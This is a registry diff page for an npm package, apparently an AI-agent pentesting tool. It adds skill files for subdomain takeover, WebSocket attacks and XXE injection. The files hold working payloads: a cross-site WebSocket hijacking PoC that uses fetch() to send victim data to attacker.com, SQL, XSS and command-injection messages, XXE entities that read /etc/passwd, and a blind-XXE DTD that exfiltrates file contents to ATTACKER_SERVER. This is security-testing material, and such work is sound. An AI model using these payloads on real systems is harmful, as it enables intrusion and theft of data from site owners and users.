npm - @cyberstrike-io/cyberstrike - Versions diffs - 1.1.13 → 1.1.14-beta.1 - Mend

@cyberstrike-io/cyberstrike 1.1.13 → 1.1.14-beta.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (24) hide show

package/hackbrowser-worker.js +107 -16
package/package.json +12 -12
package/postinstall.mjs +18 -5
package/skill/attack-cache-poison/SKILL.md +124 -0
package/skill/attack-cors/SKILL.md +116 -0
package/skill/attack-graphql/SKILL.md +121 -0
package/skill/attack-host-header/SKILL.md +106 -0
package/skill/attack-idor-automation/SKILL.md +150 -0
package/skill/attack-jwt/SKILL.md +122 -0
package/skill/attack-open-redirect/SKILL.md +129 -0
package/skill/attack-prototype-pollution/SKILL.md +132 -0
package/skill/attack-race-condition/SKILL.md +125 -0
package/skill/attack-rate-limit-bypass/SKILL.md +146 -0
package/skill/attack-request-smuggling/SKILL.md +164 -0
package/skill/attack-ssrf/SKILL.md +132 -0
package/skill/attack-ssti/SKILL.md +126 -0
package/skill/attack-subdomain-takeover/SKILL.md +114 -0
package/skill/attack-websocket/SKILL.md +136 -0
package/skill/attack-xxe/SKILL.md +144 -0
package/web/assets/{ghostty-web-BMDtVBzn.js → ghostty-web-nFGAkzUN.js} +1 -1
package/web/assets/{home-zQrDqSYd.js → home-C1IdTiFP.js} +1 -1
package/web/assets/{index-DnHYEPTe.js → index-D2hzTwHf.js} +41 -41
package/web/assets/{session-DNtIkF3a.js → session-qd_85VE9.js} +35 -35
package/web/index.html +1 -1

package/skill/attack-subdomain-takeover/SKILL.md ADDED Viewed

@@ -0,0 +1,114 @@
+---
+name: attack-subdomain-takeover
+description: "Subdomain takeover — CNAME detection, cloud service fingerprinting, dangling DNS exploitation"
+category: "web-application"
+version: "1.0"
+author: "cyberstrike-official"
+tags:
+  - subdomain-takeover
+  - dns
+  - cloud
+  - web
+  - attack
+tech_stack:
+  - aws
+  - azure
+  - gcp
+  - web
+cwe_ids:
+  - CWE-284
+chains_with: []
+prerequisites: []
+severity_boost: {}
+---
+# Subdomain Takeover
+## Objective
+Identify subdomains with dangling DNS records (CNAME pointing to unclaimed cloud resources) and claim them to serve attacker content.
+## Testing Methodology
+### Phase 1: Subdomain Enumeration
+```bash
+# Passive enumeration
+subfinder -d TARGET.com -silent | tee subdomains.txt
+# Certificate transparency
+curl -s "https://crt.sh/?q=%25.TARGET.com&output=json" | jq -r '.[].name_value' | sort -u >> subdomains.txt
+# DNS brute force
+puredns bruteforce wordlist.txt TARGET.com -r resolvers.txt >> subdomains.txt
+```
+### Phase 2: Automated Takeover Check
+```bash
+# Check all subdomains for takeover
+attack_script subdomain_takeover subdomains.txt --json-output
+```
+Checks 20 cloud services:
+- GitHub Pages, Heroku, Shopify, Tumblr, WordPress
+- AWS S3, AWS Elastic Beanstalk, Azure Web Apps
+- Netlify, Vercel, Fastly, Fly.io
+- Bitbucket, Surge, Ghost, Pantheon
+- Zendesk, README.io, Cargo, Feedpress
+### Phase 3: Manual CNAME Verification
+```bash
+# Check CNAME records
+dig +short CNAME subdomain.TARGET.com
+# Verify the pointed service is unclaimed
+curl -s https://subdomain.TARGET.com
+# Look for: "There isn't a GitHub Pages site here"
+# "No such app" (Heroku)
+# "NoSuchBucket" (S3)
+```
+### Phase 4: Cloud Storage Enumeration
+```bash
+# Check related cloud buckets
+attack_script cloud_storage_enum TARGET --json-output
+```
+### Phase 5: Claim & Verify
+After confirming a dangling CNAME:
+1. Create the resource on the target service (e.g., GitHub Pages repo, S3 bucket)
+2. Serve a harmless proof page (e.g., `cyberstrike-takeover-proof.html`)
+3. Verify it's accessible at `subdomain.TARGET.com`
+## What Constitutes a Finding
+| Finding | Severity |
+|---------|----------|
+| Subdomain takeover — attacker controls content | High (P2) |
+| S3 bucket public write access | Critical (P1) |
+| S3 bucket listing enabled | High (P2) |
+| Dangling CNAME (service unreachable) | Medium (P3) |
+| Cloud storage public read | Medium (P3) |
+## Evidence Requirements
+- Subdomain with dangling CNAME record
+- Target cloud service identified
+- Service fingerprint (error message)
+- For takeover: proof of content hosting on subdomain
+- For buckets: listing output or write proof
+## Tools
+- `attack_script subdomain_takeover` — automated CNAME + fingerprint checker
+- `attack_script cloud_storage_enum` — S3/Azure/GCP enumeration
+- `subfinder`, `puredns` — subdomain enumeration
+## References
+- [Can I Take Over XYZ](https://github.com/EdOverflow/can-i-take-over-xyz)
+- [HackerOne: Subdomain Takeover](https://www.hackerone.com/vulnerability-management/guide-subdomain-takeovers)

package/skill/attack-websocket/SKILL.md ADDED Viewed

@@ -0,0 +1,136 @@
+---
+name: attack-websocket
+description: "WebSocket security testing — CSWSH, message injection, auth bypass, origin validation"
+category: "web-application"
+version: "1.0"
+author: "cyberstrike-official"
+tags:
+  - websocket
+  - web
+  - cswsh
+  - injection
+  - attack
+tech_stack:
+  - web
+cwe_ids:
+  - CWE-1385
+  - CWE-346
+chains_with:
+  - attack-cors
+prerequisites: []
+severity_boost:
+  attack-cors: "WebSocket + CORS bypass = cross-origin data theft via WS"
+---
+# WebSocket Security Testing
+## Objective
+Exploit WebSocket implementation flaws including cross-site WebSocket hijacking (CSWSH), message injection, and authentication bypass.
+## Testing Methodology
+### Phase 1: Identify WebSocket Endpoints
+```bash
+# Look for WebSocket upgrade
+curl -s -D- https://TARGET/ -H "Upgrade: websocket" -H "Connection: Upgrade"
+# Check common paths
+for path in /ws /socket /websocket /api/ws /chat /live /realtime; do
+  curl -s -D- "https://TARGET$path" \
+    -H "Upgrade: websocket" \
+    -H "Connection: Upgrade" \
+    -H "Sec-WebSocket-Version: 13" \
+    -H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" 2>/dev/null | head -1
+done
+```
+### Phase 2: Cross-Site WebSocket Hijacking (CSWSH)
+Check if Origin header is validated:
+```bash
+# Connect with evil origin
+websocat -H "Origin: https://evil.com" "wss://TARGET/ws"
+# If connection succeeds with evil.com origin → CSWSH is possible
+```
+**PoC HTML:**
+```html
+<script>
+var ws = new WebSocket('wss://TARGET/ws');
+ws.onmessage = function(e) {
+  fetch('https://attacker.com/log?data=' + btoa(e.data));
+};
+ws.onopen = function() {
+  ws.send(JSON.stringify({action: 'get_profile'}));
+};
+</script>
+```
+### Phase 3: Authentication Testing
+```bash
+# Connect without auth token
+websocat "wss://TARGET/ws"
+# Test token reuse after logout
+websocat -H "Cookie: session=EXPIRED_TOKEN" "wss://TARGET/ws"
+# Connect with another user's token
+websocat -H "Cookie: session=VICTIM_TOKEN" "wss://TARGET/ws"
+```
+### Phase 4: Message Injection
+```bash
+# Test for SQL injection via WebSocket message
+websocat "wss://TARGET/ws" <<< '{"action":"search","query":"test\" OR 1=1--"}'
+# XSS via WebSocket message (if rendered in other clients)
+websocat "wss://TARGET/ws" <<< '{"action":"chat","message":"<img src=x onerror=alert(1)>"}'
+# Command injection
+websocat "wss://TARGET/ws" <<< '{"action":"exec","cmd":"id; cat /etc/passwd"}'
+```
+### Phase 5: Rate Limiting / DoS
+```bash
+# Rapid message sending
+for i in $(seq 1 1000); do
+  echo '{"action":"ping"}'
+done | websocat "wss://TARGET/ws"
+# Large message
+python3 -c "print('{\"data\":\"' + 'A'*1000000 + '\"}')" | websocat "wss://TARGET/ws"
+```
+## What Constitutes a Finding
+| Finding | Severity |
+|---------|----------|
+| CSWSH — cross-site WebSocket hijacking | High (P2) |
+| No authentication on WebSocket | High (P2) |
+| SQL/command injection via WS message | Critical (P1) |
+| Stored XSS via WS message | High (P2) |
+| Session not invalidated after logout | Medium (P3) |
+## Evidence Requirements
+- WebSocket endpoint URL
+- Connection with evil Origin (for CSWSH)
+- Messages sent and received
+- Proof of unauthorized data access or injection
+## Tools
+- `websocat` (external) — WebSocket CLI client
+- Browser DevTools → Network → WS tab
+## References
+- [PortSwigger: WebSocket Vulnerabilities](https://portswigger.net/web-security/websockets)
+- [OWASP: WebSocket Security](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/10-Testing_WebSockets)

package/skill/attack-xxe/SKILL.md ADDED Viewed

@@ -0,0 +1,144 @@
+---
+name: attack-xxe
+description: "XML External Entity injection — file read, SSRF, data exfiltration via out-of-band XML parsing"
+category: "web-application"
+version: "1.0"
+author: "cyberstrike-official"
+tags:
+  - xxe
+  - xml
+  - injection
+  - web
+  - attack
+tech_stack:
+  - web
+  - java
+  - php
+  - dotnet
+cwe_ids:
+  - CWE-611
+  - CWE-827
+chains_with:
+  - attack-ssrf
+prerequisites: []
+severity_boost:
+  attack-ssrf: "XXE + SSRF = internal network access via XML parser"
+---
+# XML External Entity (XXE) Injection
+## Objective
+Exploit XML parsing vulnerabilities to read local files, perform SSRF, or exfiltrate data via out-of-band channels.
+## Testing Methodology
+### Phase 1: Identify XML Processing
+Look for endpoints accepting:
+- `Content-Type: application/xml` or `text/xml`
+- SOAP endpoints (`.asmx`, `.wsdl`)
+- File upload accepting SVG, DOCX, XLSX
+- RSS/Atom feed processing
+- SAML authentication
+### Phase 2: In-Band XXE (File Read)
+```xml
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE foo [
+  <!ENTITY xxe SYSTEM "file:///etc/passwd">
+]>
+<root>&xxe;</root>
+```
+**Windows targets:**
+```xml
+<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
+```
+### Phase 3: Blind XXE (Out-of-Band)
+```xml
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE foo [
+  <!ENTITY % xxe SYSTEM "http://ATTACKER_SERVER/xxe.dtd">
+  %xxe;
+]>
+<root>test</root>
+```
+**Hosted DTD (xxe.dtd):**
+```xml
+<!ENTITY % file SYSTEM "file:///etc/hostname">
+<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://ATTACKER_SERVER/?data=%file;'>">
+%eval;
+%exfil;
+```
+Use the SSRF listener for callback detection:
+```bash
+attack_script ssrf_listener -p 8888 -o xxe_hits.json
+```
+### Phase 4: XXE via File Upload
+**SVG:**
+```xml
+<?xml version="1.0"?>
+<!DOCTYPE svg [
+  <!ENTITY xxe SYSTEM "file:///etc/passwd">
+]>
+<svg xmlns="http://www.w3.org/2000/svg">
+  <text>&xxe;</text>
+</svg>
+```
+**DOCX:** Modify `[Content_Types].xml` or `word/document.xml` inside the ZIP.
+### Phase 5: Content-Type Manipulation
+```bash
+# Switch JSON endpoint to XML
+curl -X POST https://TARGET/api/data \
+  -H "Content-Type: application/xml" \
+  -d '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'
+```
+### Phase 6: Parameter Entity Injection
+```xml
+<?xml version="1.0"?>
+<!DOCTYPE foo [
+  <!ENTITY % a "<!ENTITY xxe SYSTEM 'file:///etc/passwd'>">
+  %a;
+]>
+<root>&xxe;</root>
+```
+## What Constitutes a Finding
+| Finding | Severity |
+|---------|----------|
+| File contents read (e.g., /etc/passwd) | Critical (P1) |
+| Out-of-band DNS/HTTP callback | High (P2) |
+| SSRF via XXE | High (P2) |
+| Denial of Service (billion laughs) | Medium (P3) |
+| Error-based file path disclosure | Low (P4) |
+## Evidence Requirements
+- XML payload sent
+- Response containing file contents or error
+- For blind XXE: OOB interaction evidence (DNS/HTTP callback)
+- Server type and parser identified
+## Tools
+- `attack_script ssrf_listener` — OOB callback listener for blind XXE
+- `attack_script file_upload_tester` — SVG XXE via upload
+## References
+- [PortSwigger: XXE](https://portswigger.net/web-security/xxe)
+- [OWASP: XXE Prevention](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)